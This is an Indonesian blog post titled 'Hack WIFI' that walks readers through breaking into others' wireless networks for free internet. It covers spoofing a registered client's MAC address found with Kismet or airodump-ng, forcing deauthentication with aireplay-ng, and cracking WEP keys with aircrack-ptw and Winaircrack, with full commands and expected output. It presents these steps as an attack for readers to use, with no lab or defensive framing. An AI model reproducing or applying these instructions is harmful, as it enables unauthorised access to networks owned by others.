Membobol MAC Address Filtering:
1. Jalankan Live CD Distro Linux
BackTrack, masukkan username ?
root?, lalu masukkan password ?
toor?.
2. Setelah muncul prompt,
ketikkan ?startx?.
3. Setelah muncul desktop
environment KDE, klik tombol ?K?
(di pojok kiri bawah). Pilih
BackTrack Radio Network Analysis -
> 80211 Analyser Kismet.
4. Lalu muncul wi...ndow ?Select
Network Device?, pilih ?wifi0?.
Klik ?OK?.
5. Muncul tampilan Kismet, secara
otomatis Kismet akan mencari
wireless client yang sedang aktif.
Bila ditemukan wireless client yang
aktif tetapi tidak terhubung dengan
jaringan, maka akan muncul pesan ?
ALERT: Suspicious client
00:02:6F:37:08:20 - probing
networks but never participating.?
6. Bila Kismet berhasil menemukan
Access Point yang aktif, maka akan
muncul pesan ?Found IP 192.168.2.1
blackor ::00:0E:2E:C2:2C:0E via
ARP?.
Keterangan:
black -> nama SSID
7. Tutup Kismet, lalu buka console
untuk menjalankan tools scanning
yang lain, yakni airodump.
Keterangan:
Bila kita menggunakan program
scanning yang lain, biasanya
program pertama akan membuat
driver wireless kita ?rusak?. Untuk
dapat digunakan pada program
yang kedua, kita perlu memperbaiki
driver tersebut (dimatikan lalu
dihidupkan kembali).
8. Cara memperbaiki driver, ketik:
#airmon-ng -> untuk mengecek
interface yang tersedia.
Matikan driver ?ath0? dan ?ath1?
dengan mengetik:
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila
interface ath1 ada.
9. Mengaktifkan driver yang baru,
ketik:
#airmon-ng start wifi0
10. Bila diketikkan perintah
#iwconfig , maka muncul
informasi ?ath0? sudah aktif
dengan Mode=Monitor.
11. Berikutnya, ketik #airodump-ng
ath0
12. Dengan demikian maka
kesimpulan bahwa dengan
airodump mendapatkan hasil
scanning MAC Address Client yang
lebih cepat dibandingkan dengan
menggunakan Kismet. Tetapi Client
IP Address tidak bisa didapatkan,
kecuali menggunakan Kismet
13. Kita juga dapat menggunakan
program K-MAC(atau anda bisa
merubah MAC Address melalui
regedit) yang di-install pada
windows untuk merubah MAC-
Address Wireless kita menjadi
MAC-Address salah satu client yang
terdaftar pada MAC Address
Filtering.
14. Yang perlu dilakukan adalah
mencari informasi MAC-Address
client dengan mengunakan Kismet
atau airodump, catat MAC-Address
tersebut, lalu jalankan K-MAC di
windows dan ubah MAC-
Addressnya.
15. Setelah restart komputer/laptop
anda, dan mulai berinternet gratis
deh??..
16. Slamat memakai fasilitas Wifi
Gratis deh (^_^)
Ket :
itu kalau proteksinya hanya berupa
MAC FILTER, tapi kalau ada proteksi
lain seperti WPA atau WEP masih
ada lanjutannya lagi...!!
Terus... Ga semua perangkat wifi
mendukung cara diatas, Hanya wifi
yang support untuk INJECT PAKET
dan MONITORING MODE yang
bisa...!!
kalau proteksinya berupa WEP
lakukan cara di bawah
Menggunakan Aircrack-ptw
Akses point mengirimkan paket
yang dinamakan beacon frame
sekitar 10 beacon
frame setiap detiknya.Setiap paket
data yang dikirimkan mengandung :
1. Nama dari network/akses point
(ESSID)
2. Enkripsi yang digunakan
3. Berapa Mbit rata-rata data yang
di support
4. Channel yang sedang aktif
Data-data ini lah yang digunakan
oleh aircrak-ptw untuk menembus
proteksi dari
suatu akses point.
Aircrack-ptw adalah generasi
terbaru setelah aircrack-ng, dimana
aircrack-ptw
membutuhkan waktu yang lebih
cepat untuk mendekripsi sebuah key
dari suatu akses
point, tetapi aircrack-ptw ini masih
memerlukan komponen-komponen
dari aircrack-
ng, yaitu : airodump-ng untuk
mengcapture paket dan aireplay-ng
untuk melakukan
berbagai serangan jika perlu,
misalnya untuk memaksa target
untuk mengenerate
ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng --deauth 15 -a
00:12:17:A7:AF:E4 -c
00:0F:3D:57:FD:C0
ath0
serangan ini untuk memaksa target
untuk mengenerate ARP request.
Mode serangan yang lain adalah :
--deauth count : deauthenticate 1 or
all stations (-0)
--fakeauth delay : fake
authentication with AP (-1)
--interactive : interactive frame
selection (-2)
--arpreplay : standard ARP-request
replay (-3)
--chopchop : decrypt/chopchop WEP
packet (-4)
--fragment : generates valid
keystream (-5)
--test : tests injection and quality
(-9)
mode serangan bisa diganti dengan
menggunakan kode angka.
Langkah-Langkah Menggunakan
Aircrack-ptw
1. Configurasi wireless card
$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai
berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP
(parent: wifi0) (monitor
mode enabled)
berikan command airmon-ng start
wifi0 9, untuk
menjalankan wireless card pada
channel tertentu
$ airmon-ng start wifi0 9
maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP
(parent: wifi0)
(monitor mode enabled)
berikan command
$ ifconfig ath0 up
dan pastikan sistem harus merespon
sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:""
Nickname:""
Mode:Monitor Frequency:2.452 GHz
Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm
Sensitivity=0/3
Retry:off RTS thr:off Fragment
thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95
dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0
Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0
Missed beacon:0
2. Jalankan Airodump-ng
airodump-ng --channel X --write
prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write
tes ath0
data hasil capture akan ditulis
dalam file tes, oleh
airodump-ng akan disimpan dengan
nama tes-01.cap
3. Jalankan aireplay (optional)
Langkah ini dilakukan jika
airodump-ng tidak mendapatkan
paket yang ditangkap, maka target
dapat dipaksa untuk men-
generate ARP request
aireplay-ng --deauth 15 -a
00:12:17:A7:AF:E4 -c
00:0F:3D:57:FD:C0 ath0
deuth : jenis serangan
-a : BSSID akses point
-c : Mac Address target
15 : jumlah paket yang dikirim
4. Jalankan aircrack-ptw
$ aircrack-ptw tes-01.cap
itu kalau kalian bisa menjalankan
linux, tapi kalau ga bisa... ini ta kasi
cara lewat windows, cuman belum
tau bisa pa ga soalnya lum penah
pake cara lewat windows sih....
langsung aja deh...
Cracking WEP Menggunakan
Winaircrack dengan Windows
Winaircrack adalah sebuah
perangkat lunak berbasis Microsoft
Windows yang
merupakan pengembangan dari
software aircrack. Dimana untuk
winaircrack
ditambahakan suatu user interface
agar user tidak sulit lagi untuk
menggunakan
beberapa programnya seperti
aircrack, airdecap, airodump,
wzcook.
Cara kerja dari perangkat lunak
untuk melakukan cracking WEP
adalah
dengan melakukan monitor
terhadap seluruh paket-paket
wireless dan kemudian
paket-paket tersebut akan dianalisis
oleh program aircrack untuk
memecahkan
enkripsi WEPnya.
Implementasi winaircrack dapat
dilakukan dengan langkah-langkah
berikut :
- Lakukan pemeriksaan terhadap
kartu jaringan wireless yang
digunakan. Tidak
semua kartu jaringan didukung oleh
perangkat lunak untuk memonitor
jaringan.
Kartu jaringan wireless yang banyak
digunakan di laptop yang ada
sekarang
sebagian besar adalah Intel pro
3945ABG. Driver dari kartu jaringan
ini tidak
mendukung untuk langsung
melakukan monitor paket. Untuk itu
harus
melakukan downgrade driver
menuju ke versi 10.5.1.72 atau
10.5.1.75.
- Langkah yang berikutnya adalah
untuk menginstall program
Omnipeek.
Kegunaan program ini adalah untuk
menangkap paket-paket yang
dikirimkan
oleh access point menuju ke kartu
jaringan wireless. Biasanya paket
data
dienkripsi dalam dengan WEP.
- Selanjutnya adalah melakukan
monitoring terhadap paket wireless
yang
dilakukan dengan menekan tombol
new capture. Berikutnya pilih
bagian ?802.11?
dengan tujuan untuk memilih paket-
paket data apa saja yang akan
dimonitor.
Monitoring dapat dilakukan untuk
merekam data channel, BSSID, atau
ESSID
tertentu.
- Tekan tombol ?Capture? untuk
mulai menyimpan paket data. Jika
dirasa sudah
cukup, maka dapat ditekan tombol ?
Stop Capture? untuk menghentikan
pemantauan.
- Sinpan file yang berisi paket data
dengan ekstensi .dmp
- Program berikutnya yang
diperlukan adalah winaircrack.
Setelah menjalankan
program ini, pilih file .dmp yang
telah disimpan sebelumnya, dan
kemudian klik
tombol ?aircrack the key?
- Untuk dapat memecahkan kunci,
maka program aircrack memerlukan
jumlah
data yang sangat banyak, dapat
mencapai 300.000 data untuk
enkripsi 40 bit, dan
mencapai 800.000 paket untuk dapat
membuka kunci 104 bit
"Tanpa mencoba kita takkan pernah
tau bahwa kita Bisa.
nambah dikit...
Ingat nama file yang anda buat
sebelumnya atas? nama file saya
"test-01". jadi test-01.cap
Setelah Anda melakukan ini, Anda
akan melihat aircrack mulai crack
password. biasanya anda harus
menunggu lagi sebelum password-
nya berhasil di-crack. Jika hal ini
terjadi, aircrack akan menguji apa
yang anda punya dan akan
mengatakan sesuatu seperti "not
enough IV's. Retry at 10,000."
DON'T DO ANYTHING! biarkan tetap
berjalan ... ia hanya memberitahu
anda bahwa akan menunda proses
sampai lebih dari "IV" yang
dikumpulkan. Setelah anda selesai
10.000 ini akan tandai secara
otomatis dan mencoba untuk crack
kembali. Jika gagal ia akan berkata
"not enough IV's. Retry at 15,000."
dan seterusnya sampai akhirnya gets
it.
Jika anda melakukan semuanya
dengan benar sampai ke titik ini,
sebelum anda terlalu lama
mendapatkan password!
sekarang jika password terlihat
lemah, dont worry, ia akan tetap
bekerja. beberapa password akan
disimpan dalam format ASCII, dalam
hal ini, aircrack akan menampilkan
karakter yang mereka ketik di
password.
Kadang-kadang, walaupun,
password akan disimpan dalam
format Hex dalam hal ini komputer
akan memperlihatkan kepada anda
Hex enkripsi dari password.
It doesn't matter either way, karena
anda dapat mengetik salah satu dan
anda akan terhubung ke jaringan.
catatan :
bahwa password akan selalu
ditampilkan di aircrack dengan titik
dua setelah setiap 2 karakter.
Jadi jika misalnya password adalah
"secret", akan ditampilkan sebagai:
se: cr: et
Hal ini jelas akan menjadi format
ASCII.
Jika hal ini merupakan Hex sandi
yang dienkripsi seperti
"0FKW9427VF" maka akan tetap
ditampilkan sebagai:
0f: KW: 94:27: VF
Boot kembali ke sistem operasi apa
yang anda gunakan, coba connect ke
jaringan dan ketik password tanpa
titik dua ( : ).
Monday, February 27, 2012
Hack WIFI [ Versi Indonesia ]
Published with Blogger-droid v2.0.4